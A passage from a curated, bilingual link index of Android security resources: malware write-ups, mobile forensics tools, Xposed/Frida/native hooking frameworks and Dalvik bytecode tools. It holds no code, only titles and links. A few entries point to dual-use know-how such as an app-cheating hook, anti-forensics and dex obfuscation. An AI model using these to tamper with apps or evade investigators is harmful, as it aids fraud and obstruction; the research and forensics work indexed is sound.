malware](https://www.welivesecurity.com/2011/08/29/android-financial-transactions-on-the-rise-watch-for-malware/) - 2011.08 [trendmicro] [Android Malware Eavesdrops on Users, Uses Google+ as Disguise](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-eavesdrops-on-users-uses-google-as-disguise/) - 2011.08 [trendmicro] [Love Trap Android Malware Found in Third-Party App Stores](https://blog.trendmicro.com/trendlabs-security-intelligence/love-trap-android-malware-found-in-third-party-app-stores/) - 2011.08 [welivesecurity] [Android malware: rapidly on the rise](https://www.welivesecurity.com/2011/08/10/android-malware-rapidly-on-the-rise/) - 2011.08 [trendmicro] [Trojanized Android App Checks for Keywords in SMS Messages](https://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-android-app-checks-for-keywords-in-sms-messages/) - 2011.07 [virusbulletin] [Zitmo trojan for Android defeats two-factor authentication](https://www.virusbulletin.com/blog/2011/07/zitmo-trojan-android-defeats-two-factor-authentication/) - 2011.07 [mcafee] [Dissecting Zeus for Android (or Is It Just SMS Spyware?)](https://securingtomorrow.mcafee.com/mcafee-labs/dissecting-zeus-for-android-or-is-it-just-an-sms-spyware/) - 2011.07 [krebsonsecurity] [ZeuS Trojan for Google Android Spotted](https://krebsonsecurity.com/2011/07/zeus-trojan-for-google-android-spotted/) - 2011.07 [trendmicro] [New Android Malware on the Road: GoldDream “Catcher”](https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-malware-on-the-road-golddream-catcher/) - 2011.06 [trendmicro] [Android Malware Acts as an SMS Relay](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-acts-as-an-sms-relay/) - 2011.06 [lookout] [UPDATE: Security Alert: Android Trojan GGTracker Charges Premium Rate SMS Messages](https://blog.lookout.com/update-security-alert-android-trojan-ggtracker-charges-premium-rate-sms-messages) - 2011.06 [sans] [8 Articles for Learning Android Mobile Malware Analysis](https://digital-forensics.sans.org/blog/2011/06/09/android-mobile-malware-analysis-article) - 2011.06 [trendmicro] [Analysis of DroidDreamLight Android Malware](https://blog.trendmicro.com/trendlabs-security-intelligence/analysis-of-droiddreamlight-android-malware/) - 2011.05 [securelist] [Malware in the Android Market: here we go again](https://securelist.com/malware-in-the-android-market-here-we-go-again/29854/) - 2011.05 [trendmicro] [Android Malware Targets China Mobile Subscribers](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-targets-china-mobile-subscribers/) - 2011.03 [securelist] [Malware in the Android Market part 3](https://securelist.com/malware-in-the-android-market-part-3/29841/) - 2011.03 [sans] [DroidDream android malware analysis](https://isc.sans.edu/forums/diary/DroidDream+android+malware+analysis/10495/) - 2011.03 [trendmicro] [Trojanized Apps Root Android Devices](https://blog.trendmicro.com/trendlabs-security-intelligence/trojanized-apps-root-android-devices/) - 2011.03 [securelist] [Malware in the Android Market, part 2](https://securelist.com/malware-in-the-android-market-part-2/29836/) - 2011.03 [securelist] [Malware in the Android Market](https://securelist.com/malware-in-the-android-market/29834/) - 2011.01 [trendmicro] [Android Malware Spreads via Third-Party App Stores](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-spreads-via-third-party-app-stores/) - 2011.01 [alienvault] [Inside Geinimi Android Trojan. Chapter Two: How to check remotely the presence of the trojan](https://www.alienvault.com/blogs/labs-research/inside-geinimi-android-trojan-chapter-two-how-to-check-remotely-the-presen) - 2011.01 [alienvault] [Inside Geinimi Android Trojan. Chapter One: Encrypted data and communication](https://www.alienvault.com/blogs/labs-research/inside-geinimi-android-trojan-chapter-one-encrypted-data-and-communication) - 2010.12 [sans] [Android malware enters 2011](https://isc.sans.edu/forums/diary/Android+malware+enters+2011/10186/) - 2010.09 [securelist] [Android SMS Trojan Now Being Delivered via SEO Techniques](https://securelist.com/android-sms-trojan-now-being-delivered-via-seo-techniques/29698/) - 2010.08 [talosintelligence] [Malware on Android? Big deal!](https://blog.talosintelligence.com/2010/08/malware-on-android-big-deal.html) - 2010.08 [virusbulletin] [Android SMS trojan goes wild](https://www.virusbulletin.com/blog/2010/08/android-sms-trojan-goes-wild/) - 2010.08 [securelist] [First SMS Trojan for Android](https://securelist.com/first-sms-trojan-for-android/29731/) - 2010.08 [trendmicro] [First Android Trojan in the Wild](https://blog.trendmicro.com/trendlabs-security-intelligence/first-android-trojan-in-the-wild/) - 2010.08 [oberheide] [Dexcode Teardown of the Android SMS Trojan](https://jon.oberheide.org/blog/2010/08/10/dexcode-teardown-of-the-android-sms-trojan/) - 2010.08 [alienvault] [Analysis of Trojan-SMS.AndroidOS.FakePlayer.a](https://www.alienvault.com/blogs/labs-research/analysis-of-trojan-smsandroidosfakeplayera) - 2010.03 [sans] [Vodafone Android Phone: Complete with Mariposa Malware](https://isc.sans.edu/forums/diary/Vodafone+Android+Phone+Complete+with+Mariposa+Malware/8389/) *** ## <a id="fcb2e498f1a3378bf3e2dd5adda43e03"></a>取证 ### <a id="0cddb153bfea5b5abcf0f4a44be6ccc5"></a>工具 - [**395**星][2m] [Py] [den4uk/andriller](https://github.com/den4uk/andriller) a collection of forensic tools for smartphones - [**255**星][1m] [Py] [orlikoski/cdqr](https://github.com/orlikoski/CDQR) a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux, MacOS, and Android devices - [**108**星][5y] [Py] [mspreitz/adel](https://github.com/mspreitz/adel) dumps all important SQLite Databases from a connected Android smartphone to the local disk and analyzes these files in a forensically accurate workflow - [**108**星][3y] [projectretroscope/retroscope](https://github.com/projectretroscope/retroscope) Public release of the RetroScope Android memory forensics framework - [**41**星][3y] [HTML] [scorelab/androphsy](https://github.com/scorelab/androphsy) An Open Source Mobile Forensics Investigation Tool for Android Platform - [**26**星][4y] [Py] [cyberhatcoil/acf](https://github.com/cyberhatcoil/acf) Android Connections Forensics - [**8**星][8y] [Py] [agnivesh/aft](https://github.com/agnivesh/aft) [Deprecated] Android Forensic Toolkit ### <a id="73a56c2788dc27af4f49cbf1811ee1e9"></a>文章 - 2018.06 [pediy] [[翻译]WhatsApp取证:对加密数据库进行解密和在尚未被Root的Android设备上提取已删除的消息](https://bbs.pediy.com/thread-228608.htm) - 2018.03 [hackers] [Digital Forensics, Part 10: Mobile Forensics (Android)](https://www.hackers-arise.com/single-post/2018/03/25/Digital-Forensics-Part-10-Mobile-Forensics-Android) - 2018.03 [360] [WhatsApp取证技术:如何在未Root的Android设备上解密数据库](https://www.anquanke.com/post/id/98382/) - 2018.01 [elcomsoft] [Forensic Implications of Software Updates: iOS, Android, Windows 10 Mobile](https://blog.elcomsoft.com/2018/01/forensic-implications-of-software-updates-ios-android-windows-10-mobile/) - 2017.09 [arxiv] [[1709.05296] Forensics Analysis of Android Mobile VoIP Apps](https://arxiv.org/abs/1709.05296) - 2017.09 [arxiv] [[1709.05144] Performance of Android Forensics Data Recovery Tools](https://arxiv.org/abs/1709.05144) - 2017.08 [0x00sec] [How to master Android Forensics?](https://0x00sec.org/t/how-to-master-android-forensics/3328/) - 2017.06 [arxiv] [[1706.08045] An Android Cloud Storage Apps Forensic Taxonomy](https://arxiv.org/abs/1706.08045) - 2017.01 [nomotion] [New Training Course – Android Forensics – No $5 Wrench Required!](https://www.nomotion.net/blog/new-training-course-android-forensics/) - 2016.10 [arxiv] [[1610.06721] Forensic Analysis of the ChatSecure Instant Messaging Application on Android Smartphones](https://arxiv.org/abs/1610.06721) - 2016.01 [elcomsoft] [Forensic Acquisition: Android](https://blog.elcomsoft.com/2016/01/forensic-acquisition-android/) - 2015.10 [hackingarticles] [Android Mobile Device Forensics with Mobile Phone Examiner Plus](http://www.hackingarticles.in/android-mobile-device-forensics-with-mobile-phone-examiner-plus/) - 2015.10 [hackingarticles] [How to Create a Forensic Image of Android Phone using Magnet Acquire](http://www.hackingarticles.in/how-to-create-a-forensic-image-of-andorid-phone-using-magnet-acquire/) - 2015.10 [hackingarticles] [Forensics Investigation of Android Phone using Andriller](http://www.hackingarticles.in/forensics-investigation-of-android-phone-using-andriller/) - 2015.10 [hackingarticles] [Logical Forensics of an Android Device using AFLogical](http://www.hackingarticles.in/logical-forensics-of-an-android-device-using-aflogical/) - 2015.07 [arxiv] [[1507.07739] Forensic Analysis of WhatsApp Messenger on Android Smartphones](https://arxiv.org/abs/1507.07739) - 2015.06 [arxiv] [[1506.05533] Mobile Cloud Forensics: An Analysis of Seven Popular Android Apps](https://arxiv.org/abs/1506.05533) - 2014.11 [vxsecurity] [[ Super Funday Mini Series : LINE Forensic Artifacts – Android Edition ]](http://www.vxsecurity.sg/2014/11/09/super-funday-mini-series-line-forensic-artifacts-android-edition/) - 2014.11 [vxsecurity] [[ Super Funday Mini Series : Viber Forensic Artifacts – Android Edition ]](http://www.vxsecurity.sg/2014/11/02/super-funday-mini-series-viber-forensic-artifacts-android-edition/) - 2014.01 [arxiv] [[1401.6444] Android Anti-forensics: Modifying CyanogenMod](https://arxiv.org/abs/1401.6444) - 2013.10 [cerbero] [An analysis module for Android: announcing the Forensic Edition](http://cerbero-blog.com/?p=1305) - 2013.06 [volatility] [MoVP II - 3.5 - Utilizing the kmem_cache for Android Memory Forensics](https://volatility-labs.blogspot.com/2013/06/movp-ii-35-utilizing-kmemcache-for.html) - 2013.05 [volatility] [MoVP II - 3.2 - Linux/Android Memory Forensics with Python and Yara](https://volatility-labs.blogspot.com/2013/05/movp-ii-32-linuxandroid-memory.html) - 2013.05 [sans] [Digital Forensics Case Leads: First ICS HoneyPot, IEF EnScripts, Android Forensics, Unit 61398 - The APT1 guys, CALEA Act and more...](https://digital-forensics.sans.org/blog/2013/05/26/digital-forensics-case-leads-first-ics-honeypot-ief-enscripts-android-forensics-unit-61398-the-apt1-guys-calea-act-and-more) - 2013.04 [arxiv] [[1304.4915] Forensic Analysis of Instant Messenger Applications on Android Devices](https://arxiv.org/abs/1304.4915) - 2013.01 [pediy] [[推荐]Android取证和安全测试开放课程](https://bbs.pediy.com/thread-160891.htm) - 2012.10 [securityartwork] [Android Log Forensics](https://www.securityartwork.es/2012/10/31/android-log-forensics-2/) - 2012.06 [privacy] [A Forensic Analysis of Android Network Traffic 5: Conclusions](http://privacy-pc.com/articles/a-forensic-analysis-of-android-network-traffic-5-conclusions.html) - 2012.06 [privacy] [A Forensic Analysis of Android Network Traffic 4: Geolocation by Google](http://privacy-pc.com/articles/a-forensic-analysis-of-android-network-traffic-4-geolocation-by-google.html) - 2012.06 [privacy] [A Forensic Analysis of Android Network Traffic 2: Research methodology](http://privacy-pc.com/articles/a-forensic-analysis-of-android-network-traffic-2-research-methodology.html) - 2012.06 [privacy] [A Forensic Analysis of Android Network Traffic 3: Data harvesting by Zynga and Words With Friends](http://privacy-pc.com/articles/a-forensic-analysis-of-android-network-traffic-3-data-harvesting-by-zynga-and-words-with-friends.html) - 2012.06 [sogeti] [Forensics on Android phones and security measures](http://esec-lab.sogeti.com/posts/2012/06/22/forensics-on-android-phones-and-security-measures.html) - 2012.06 [privacy] [A Forensic Analysis of Android Network Traffic](http://privacy-pc.com/articles/a-forensic-analysis-of-android-network-traffic.html) - 2012.01 [sans] [Digital Forensics Case Leads: New version of REMnux, tools for imaging iPhone and Android devices, and a list of "Best Reads" from 2011](https://digital-forensics.sans.org/blog/2012/01/13/digital-forensics-case-leads-new-version-of-remnux-tools-for-imaging-iphone-and-android-devices-and-a-list-of-best-reads-from-2011) - 2011.07 [toolswatch] [Android Forensics made easy with viaExtract !!](http://www.toolswatch.org/2011/07/android-forensics-made-easy-with-viaextract/) - 2011.06 [sans] [Digital Forensics Case Leads: Androids, Breaches, & Clouds All Around](https://digital-forensics.sans.org/blog/2011/06/16/digital-forensics-case-leads-androids-breaches-clouds) - 2010.03 [sans] [Open Source Android Digital Forensics Application](https://digital-forensics.sans.org/blog/2010/03/01/open-source-android-digital-forensics-application) *** ## <a id="70cd678f065f0cbd109b5fb665aed139"></a>Hook ### <a id="07c5aa963e1201a7c162ccb84ec1fb28"></a>XPosed #### <a id="41ac1eb0f56af536a7aed91a6983e95f"></a>工具 - [**1763**星][2y] [Java] [ac-pm/inspeckage](https://github.com/ac-pm/inspeckage) Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. (Xposed Module) - [**1730**星][4m] [Java] [tiann/epic](https://github.com/tiann/epic) Dynamic java method AOP hook for Android(continution of Dexposed on ART), Supporting 4.0~10.0 - [**708**星][1m] [Java] [ganyao114/sandhook](https://github.com/ganyao114/sandhook) Android ART Hook/Native Inline Hook/Single Instruction Hook - support 4.4 - 10.0 32/64 bit - Xposed API Compat - [**429**星][4y] [Makefile] [mindmac/androideagleeye](https://github.com/mindmac/androideagleeye) An Xposed and adbi based module which is capable of hooking both Java and Native methods targeting Android OS. - [**220**星][1y] [C] [gtoad/android_inline_hook](https://github.com/gtoad/android_inline_hook) Build an so file to automatically do the android_native_hook work. Supports thumb-2/arm32 and ARM64 ! With this, tools like Xposed can do android native hook. - [**169**星][2m] [Java] [546669204/wechatbot-xposed](https://github.com/546669204/wechatbot-xposed) A WeChat robot unit ,based on the android xposed framework hook to implement WeChat app robot functions - [**128**星][2y] [Java] [bmax121/budhook](https://github.com/bmax121/budhook) An Android hook framework written like Xposed,based on YAHFA. - [**104**星][5y] [Java] [rednaga/dexhook](https://github.com/rednaga/dexhook) DexHook is a xposed module for capturing dynamically loaded dex files. - [**50**星][1y] [Py] [hrkfdn/deckard](https://github.com/hrkfdn/deckard) Deckard performs static and dynamic binary analysis on Android APKs to extract Xposed hooks #### <a id="dc6d6d158e806f4f9d02ed8b43c5c501"></a>文章 - 2019.01 [fuping] [安卓APP测试之HOOK大法-Xposed篇](https://fuping.site/2019/01/28/Xposed-Hook-SoulApp/) - 2018.09 [pediy] [[原创]Android Hook 系列教程(一) Xposed Hook 原理分析](https://bbs.pediy.com/thread-247030.htm) - 2018.03 [pediy] [[分享]Xposed Hook Apk不在classes.dex中定义的类](https://bbs.pediy.com/thread-225190.htm) - 2017.11 [pediy] [[原创]Epic——ART上的Dexposed(无侵入式Hook框架)](https://bbs.pediy.com/thread-222931.htm) - 2017.07 [pediy] [[求助]xposed怎么hook一个主dex加载的jar(包含dex)](https://bbs.pediy.com/thread-219312.htm) - 2015.01 [freebuf] [使用渗透测试框架Xposed Framework hook调试Android APP](http://www.freebuf.com/articles/terminal/56453.html) - 2015.01 [attify] [Xposed Framework for Android Hooking](http://blog.attify.com/2015/01/04/xposed-framework-android-hooking/) - 2015.01 [attify] [Xposed Framework for Android Hooking](https://blog.attify.com/xposed-framework-android-hooking/) ### <a id="7de48e67d0fc795c29ba29ea12c6db80"></a>Frida #### <a id="f70d1610a9446395aa5de9cae70b43c3"></a>工具 - [**277**星][2y] [Py] [antojoseph/frida-android-hooks](https://github.com/antojoseph/frida-android-hooks) Lets you hook Method Calls in Frida ( Android ) - [**271**星][1m] [JS] [frenchyeti/dexcalibur](https://github.com/frenchyeti/dexcalibur) Dynamic binary instrumentation tool designed for Android application and powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform. - [**99**星][2y] [Java] [piasy/fridaandroidtracer](https://github.com/piasy/fridaandroidtracer) A runnable jar that generate Javascript hook script to hook Android classes. - [**30**星][9m] [TS] [igio90/frida-onload](https://github.com/igio90/frida-onload) Frida module to hook module initializations on android - [**3**星][3m] [Py] [margular/frida-skeleton](https://github.com/margular/frida-skeleton) This repository is supposed to define infrastructure of frida on hook android including some useful functions #### <a id="997a6a2140fc004cb639429adfb68ac7"></a>文章 - 2019.11 [securify] [Android Frida hooking: disabling FLAG_SECURE](https://www.securify.nl/en/blog/SFY20191103/android-frida-hooking_-disabling-flag_secure.html) - 2019.01 [fuping] [安卓APP测试之HOOK大法-Frida篇](https://fuping.site/2019/01/25/Frida-Hook-SoulAPP/) - 2019.01 [pediy] [[原创]介召几个frida在安卓逆向中使用的脚本以及延时Hook手法](https://bbs.pediy.com/thread-248848.htm) - 2018.09 [pediy] [[原创]使用frida来hook加固的Android应用的java层](https://bbs.pediy.com/thread-246767.htm) - 2018.07 [pediy] [[原创]进阶Frida--Android逆向之动态加载dex Hook(三)(下篇)](https://bbs.pediy.com/thread-229657.htm) - 2018.07 [pediy] [[原创]进阶Frida--Android逆向之动态加载dex Hook(三)(上篇)](https://bbs.pediy.com/thread-229597.htm) - 2018.06 [pediy] [[原创]初识Frida--Android逆向之Java层hook (二)](https://bbs.pediy.com/thread-227233.htm) - 2018.06 [pediy] [[原创]初识Frida--Android逆向之Java层hook (一)](https://bbs.pediy.com/thread-227232.htm) - 2017.04 [fuping] [Android HOOK 技术之Frida的初级使用](https://fuping.site/2017/04/01/Android-HOOK-%E6%8A%80%E6%9C%AF%E4%B9%8BFrida%E7%9A%84%E5%88%9D%E7%BA%A7%E4%BD%BF%E7%94%A8/) ### <a id="4e9f32429486266721e7e21efa0ce727"></a>工具 - [**1572**星][4m] [C] [iqiyi/xhook](https://github.com/iqiyi/xhook) a PLT (Procedure Linkage Table) hook library for Android native ELF - [**1437**星][1y] [Java] [aslody/legend](https://github.com/aslody/legend) (Android)无需Root即可Hook Java方法的框架, 支持Dalvik和Art环境 - [**839**星][1m] [C++] [aslody/whale](https://github.com/aslody/whale) Hook Framework for Android/IOS/Linux/MacOS - [**789**星][1y] [C] [ele7enxxh/android-inline-hook](https://github.com/ele7enxxh/android-inline-hook) thumb16 thumb32 arm32 inlineHook in Android - [**697**星][11m] [Java] [pagalaxylab/yahfa](https://github.com/PAGalaxyLab/YAHFA) Yet Another Hook Framework for ART - [**550**星][1y] [Java] [pagalaxylab/virtualhook](https://github.com/PAGalaxyLab/VirtualHook) Android application hooking tool based on VirtualApp - [**448**星][5y] [C++] [boyliang/allhookinone](https://github.com/boyliang/allhookinone) all method hook approachs for android such as dalvik hook, art hook, elf hook and inline hook - [**401**星][2m] [Java] [pqpo/inputmethodholder](https://github.com/pqpo/inputmethodholder) 通过hook监听系统键盘显示 - [**376**星][2m] [C] [turing-technician/fasthook](https://github.com/turing-technician/fasthook) Android ART Hook - [**374**星][4y] [Py] [androidhooker/hooker](https://github.com/androidhooker/hooker) Hooker is an opensource project for dynamic analyses of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. - [**332**星][1m] [Java] [mar-v-in/arthook](https://github.com/mar-v-in/arthook) Library for hooking on ART - [**216**星][3y] [Java] [zhengmin1989/wechatsportcheat](https://github.com/zhengmin1989/wechatsportcheat) 手把手教你当微信运动第一名 – 利用Android Hook进行微信运动作弊 - [**195**星][3m] [Java] [panhongwei/androidmethodhook](https://github.com/panhongwei/androidmethodhook) android art hook like Sophix - [**190**星][2m] [C++] [aslody/elfhook](https://github.com/aslody/elfhook) modify PLT to hook api, supported android 5\6. - [**129**星][1m] [Java] [turing-technician/virtualfasthook](https://github.com/turing-technician/virtualfasthook) Android application hooking tool based on FastHook + VirtualApp - [**120**星][2m] [C++] [melonwxd/elfhooker](https://github.com/melonwxd/elfhooker) 兼容Android 32位和64位。基于EFL文件格式Hook的demo,hook了SurfaceFlinger进程的eglSwapBuffers函数,替换为new_eglSwapBuffers - [**99**星][1m] [C++] [woxihuannisja/stormhook](https://github.com/woxihuannisja/stormhook) StormHook is a Android Hook Framework for Dalvik and Art - [**58**星][5m] [Java] [nightoftwelve/virtualhookex](https://github.com/nightoftwelve/virtualhookex) Android application hooking tool based on VirtualHook/VirtualApp - [**51**星][5y] [C++] [ikoz/androidsubstrate_hookingc_examples](https://github.com/ikoz/androidsubstrate_hookingc_examples) AndroidSubstrate_hookingC_examples - [**48**星][2m] [C] [shunix/androidgothook](https://github.com/shunix/androidgothook) GOT Hook implemented in Android - [**38**星][4m] [C++] [chickenhook/chickenhook](https://github.com/chickenhook/chickenhook) A linux / android / MacOS hooking framework - [**24**星][8m] [C++] [dodola/dinlinehook](https://github.com/dodola/dinlinehook) simple art inline hook - [**14**星][2m] [C++] [vito11/camerahook](https://github.com/vito11/camerahook) An prototype to hook android camera preview data of third-party and system apps - [**2**星][5y] [Java] [nodoraiz/latchhooks](https://github.com/nodoraiz/latchhooks) Hack for Android app hooking using latch - [**0**星][3y] [serval-snt-uni-lu/hookranker](https://github.com/serval-snt-uni-lu/hookranker) Automatically Locating Malicious Payload in Piggybacked Android Apps (A Hook Ranking Approach) ### <a id="c52fb5d0961a84619a88a875380554c1"></a>文章 - 2019.01 [pediy] [[原创]Whale -- ART Hook的最方案与实践](https://bbs.pediy.com/thread-249212.htm) - 2019.01 [pediy] [[原创]尝试着实现了一个 ART Hook](https://bbs.pediy.com/thread-249163.htm) - 2018.11 [bugbountywriteup] [Android Hook — ASIS CTF Final 2018 — Gunshops Question Walkthrough](https://medium.com/p/ae5dfe8b5df0) - 2018.09 [pediy] [[原创]Android Hook 系列教程(二) 自己写APK实现Hook Java层函数](https://bbs.pediy.com/thread-247051.htm) - 2018.01 [360] [YAHFA--ART环境下的Hook框架](https://www.anquanke.com/post/id/96231/) - 2017.08 [pediy] [[原创]StormHook:Android侵入式Hook框架](https://bbs.pediy.com/thread-220760.htm) - 2017.06 [4hou] [AssetHook:Android应用资源数据运行时编辑工具](http://www.4hou.com/technology/5069.html) - 2017.05 [pediy] [[原创]全能HOOK框架 JNI NATIVE JAVA ART DALVIK](https://bbs.pediy.com/thread-217587.htm) - 2017.03 [aliyun] [浅谈Android Hook技术](https://xz.aliyun.com/t/230) - 2017.02 [360] [使用高级反调试与反HOOK的安卓恶意ROOT软件的深度分析(二):JAVA层分析](https://www.anquanke.com/post/id/85427/) - 2017.02 [360] [使用高级反调试与反HOOK的安卓恶意ROOT软件的深度分析(一):NATIVE层的调试](https://www.anquanke.com/post/id/85426/) - 2017.02 [venus] [深度分析使用高级反调试和反hook的Android Rootnik Malware,Part II:分析JAVA层](https://paper.seebug.org/209/) - 2017.02 [venus] [深度分析使用高级反调试和反hook的Android Rootnik Malware,Part I:在Native层调试](https://paper.seebug.org/204/) - 2017.01 [fortinet] [Deep Analysis of Android Rootnik Malware Using Advanced Anti-Debug and Anti-Hook, Part I: Debugging in The Scope of Native Layer](https://www.fortinet.com/blog/threat-research/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer.html) - 2017.01 [fortinet] [Deep Analysis of Android Rootnik Malware Using Advanced Anti-Debug and Anti-Hook, Part II: Analysis of The Scope of Java](https://www.fortinet.com/blog/threat-research/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java.html) - 2017.01 [360] [hook Android系统调用的乐趣和好处](https://www.anquanke.com/post/id/85375/) - 2017.01 [pediy] [[原创]安卓Hook函数的复杂参数如何给定?](https://bbs.pediy.com/thread-215039.htm) - 2016.09 [pediy] [[分享]Hook Android C代码基础总结](https://bbs.pediy.com/thread-212943.htm) - 2016.06 [securitygossip] [ArtHook: Callee-side Method Hook Injection on the New Android Runtime ART](http://securitygossip.com/blog/2016/06/29/2016-06-29/) - 2016.06 [sjtu] [ArtHook: Callee-side Method Hook Injection on the New Android Runtime ART](https://loccs.sjtu.edu.cn/gossip/blog/2016/06/29/2016-06-29/) - 2016.03 [sensepost] [Android hooking with Introspy](https://sensepost.com/blog/2016/android-hooking-with-introspy/) - 2016.01 [ele7enxxh] [Android Arm Inline Hook](http://ele7enxxh.com/Android-Arm-Inline-Hook.html) - 2016.01 [freebuf] [Android系统调用hook研究(一)](http://www.freebuf.com/articles/system/93168.html) - 2015.12 [d3adend] [Android Anti-Hooking Techniques in Java](https://d3adend.org/blog/posts/android-anti-hooking-techniques-in-java/) - 2015.12 [d3adend] [Android Anti-Hooking Techniques in Java](http://d3adend.org/blog/?p=589) - 2015.11 [pediy] [[原创]开源 Android inline hook](https://bbs.pediy.com/thread-205741.htm) - 2015.09 [pediy] [[原创]Android5.1 Art Hook 技术分享,求加精转正式会员](https://bbs.pediy.com/thread-204183.htm) - 2015.09 [360] [手把手教你当微信运动第一名 – 利用Android Hook进行微信运动作弊](https://www.anquanke.com/post/id/82323/) - 2015.06 [koz] [Substrate - hooking C on Android](https://koz.io/android-substrate-c-hooking/) - 2015.05 [evilsocket] [Android Native API Hooking With Library Injection and ELF Introspection.](https://www.evilsocket.net/2015/05/04/android-native-api-hooking-with-library-injecto/) - 2015.04 [L173864930] [Android Art Hook 技术方案](https://blog.csdn.net/L173864930/article/details/45035521) - 2014.12 [gdssecurity] [Hooking Non-Public Methods With the NDK - Using Mobile Substrate For Android Part 2](https://blog.gdssecurity.com/labs/2014/12/16/hooking-non-public-methods-with-the-ndk-using-mobile-substra.html) - 2014.11 [ele7enxxh] [Android GOT表HOOK技术](http://ele7enxxh.com/Android-Shared-Library-Hook-With-GOT.html) - 2014.10 [L173864930] [基于Android的ELF PLT/GOT符号重定向过程及ELF Hook实现(by 低端码农 2014.10.27)](https://blog.csdn.net/L173864930/article/details/40507359) - 2014.10 [pediy] [[原创]基于Android的ELF PLT/GOT符号重定向过程及ELF Hook实现](https://bbs.pediy.com/thread-193720.htm) - 2014.08 [Roland] [Android平台下Dalvik层hook框架ddi的研究](https://blog.csdn.net/Roland_Sun/article/details/38640297) - 2014.06 [Roland] [Android平台下hook框架adbi的研究(下)](https://blog.csdn.net/Roland_Sun/article/details/36049307) - 2014.06 [Roland] [Android平台下hook框架adbi的研究(上)](https://blog.csdn.net/Roland_Sun/article/details/34109569) - 2014.03 [pediy] [[原创]注入安卓进程,并hook java世界的方法](https://bbs.pediy.com/thread-186054.htm) - 2013.12 [u011069813] [Android中的so注入(inject)和挂钩(hook) - For both x86 and arm](https://blog.csdn.net/u011069813/article/details/17285009) - 2013.11 [] [Android下通过hook技术实现透明加解密保障数据安全](http://www.91ri.org/7714.html) - 2013.08 [jinzhuojun] [Android中的so注入(inject)和挂钩(hook) - For both x86 and arm](https://blog.csdn.net/jinzhuojun/article/details/9900105) - 2013.07 [u011069813] [android hook api](https://blog.csdn.net/u011069813/article/details/9271851) *** ## <a id="df9d9982d70a9b99fdfc0c27bac60e12"></a>加固&&破解 # <a id="c8cd36b0b75c53d7b4caa914f6dd2600"></a>其他 *** ## <a id="5b17938e2cb613edbe566bc475877103"></a>Dalvik ### <a id="d1c1bf3368f35715c87fa697dc021d06"></a>工具 - [**432**星][5m] [Java] [aosp-mirror/platform_dalvik](https://github.com/aosp-mirror/platform_dalvik) mirrored from https://android.googlesource.com/platform/dalvik.git - [**362**星][5y] [C] [crmulliner/ddi](https://github.com/crmulliner/ddi) Dynamic Dalvik Instrumentation Toolkit - [**238**星][2m] [Java] [dexpatcher/dexpatcher-tool](https://github.com/dexpatcher/dexpatcher-tool) Android Dalvik bytecode patcher. - [**130**星][10m] [OCaml] [plum-umd/redexer](https://github.com/plum-umd/redexer) The Redexer binary instrumentation framework for Dalvik bytecode - [**94**星][5y] [Py] [thuxnder/dalvik-obfuscator](https://github.com/thuxnder/dalvik-obfuscator) a set of tools/scripts to obfuscate and manipulate dex files - [**87**星][2y] [Shell] [jakewharton/dalvik-dx](https://github.com/jakewharton/dalvik-dx) A standalone packaging of AOSP's platform/dalvik dx library. - [**65**星][2y] [Py] [cryptax/dextools](https://github.com/cryptax/dextools) Miscellaenous DEX (Dalvik Executable) tools - [**50**星][3y] [C] [leonnewton/selfmodify](https://github.com/leonnewton/selfmodify) Dalvik字节码自篡改原理及实现 - [**41**星][2m] [C#] [sailro/dexer](https://github.com/sailro/dexer) Dexer is an open source framework, written in C#, that reads and writes .DEX files (Dalvik Executable Format) used by the Android Open Source Project. - [**40**星][7y] [C++] [taintdroid/android_platform_dalvik](https://github.com/taintdroid/android_platform_dalvik) Mirror of git://android.git.kernel.org/platform/dalvik.git with TaintDroid additions (mirror lags official Android) - [**33**星][5m] [Nim] [akavel/dali](https://github.com/akavel/dali) Indie assembler/linker for Dalvik VM .dex & .apk files (Work In Progress) - [**17**星][7y] [C++] [strazzere/dalvik-header-plugin](https://github.com/strazzere/dalvik-header-plugin) Dalvik Header Plugin for IDA Pro - [**6**星][2y] [Py] [silentsignal/android-param-annotate](https://github.com/silentsignal/android-param-annotate) Android parameter annotator for Dalvik/Smali disassembly ### <a id="66b8d79829c4b1448d9ad702333097d8"></a>文章 - 2019.08 [aliyun] [深入理解Apk加固之Dex保护](https://xz.aliyun.com/t/5820) - 2019.07 [aliyun] [Dex简单保护](https://xz.aliyun.com/t/5789) - 2019.06 [4hou] [开发一个基于Dalvik字节码的相似性检测引擎,比较同一款Android应用程序的不同版本之间的代码差异(二)](https://www.4hou.com/web/18576.html) - 2019.06 [4hou] [开发一个基于Dalvik字节码的相似性检测引擎,比较同一款Android应用程序的不同版本之间的代码差异(一)](https://www.4hou.com/web/18496.html) - 2018.04 [pediy] [[原创]Dalvik解释器源码到VMP分析](https://bbs.pediy.com/thread-226214.htm) - 2018.01 [pediy] [[原创][原创]dalvik虚拟机启动及运行原理的研究](https://bbs.pediy.com/thread-224365.htm) - 2017.06 [pnfsoftware] [Android O and DEX 38: Dalvik Opcodes for Dynamic Invocation](https://www.pnfsoftware.com/blog/android-o-and-dex-version-38-new-dalvik-opcodes-to-support-dynamic-invocation/) - 2017.06 [arxiv] [[1706.06925] Static Dalvik VM bytecode instrumentation](https://arxiv.org/abs/1706.06925) - 2016.08 [calebfenton] [Understanding Dalvik Static Fields part 2 of 2](http://calebfenton.github.io/2016/08/21/understanding_dalvik_static_fields_2_of_2/) - 2016.08 [arxiv] [[1608.04362] Computational Soundness for Dalvik Bytecode](https://arxiv.org/abs/1608.04362) - 2016.07 [pediy] [[原创]Dalvik字节码自篡改原理及实现](https://bbs.pediy.com/thread-211331.htm) - 2016.04 [securityblog] [Dalvik dex format assembler and disassembler](http://securityblog.gr/3355/dalvik-dex-format-assembler-and-disassembler/) - 2016.02 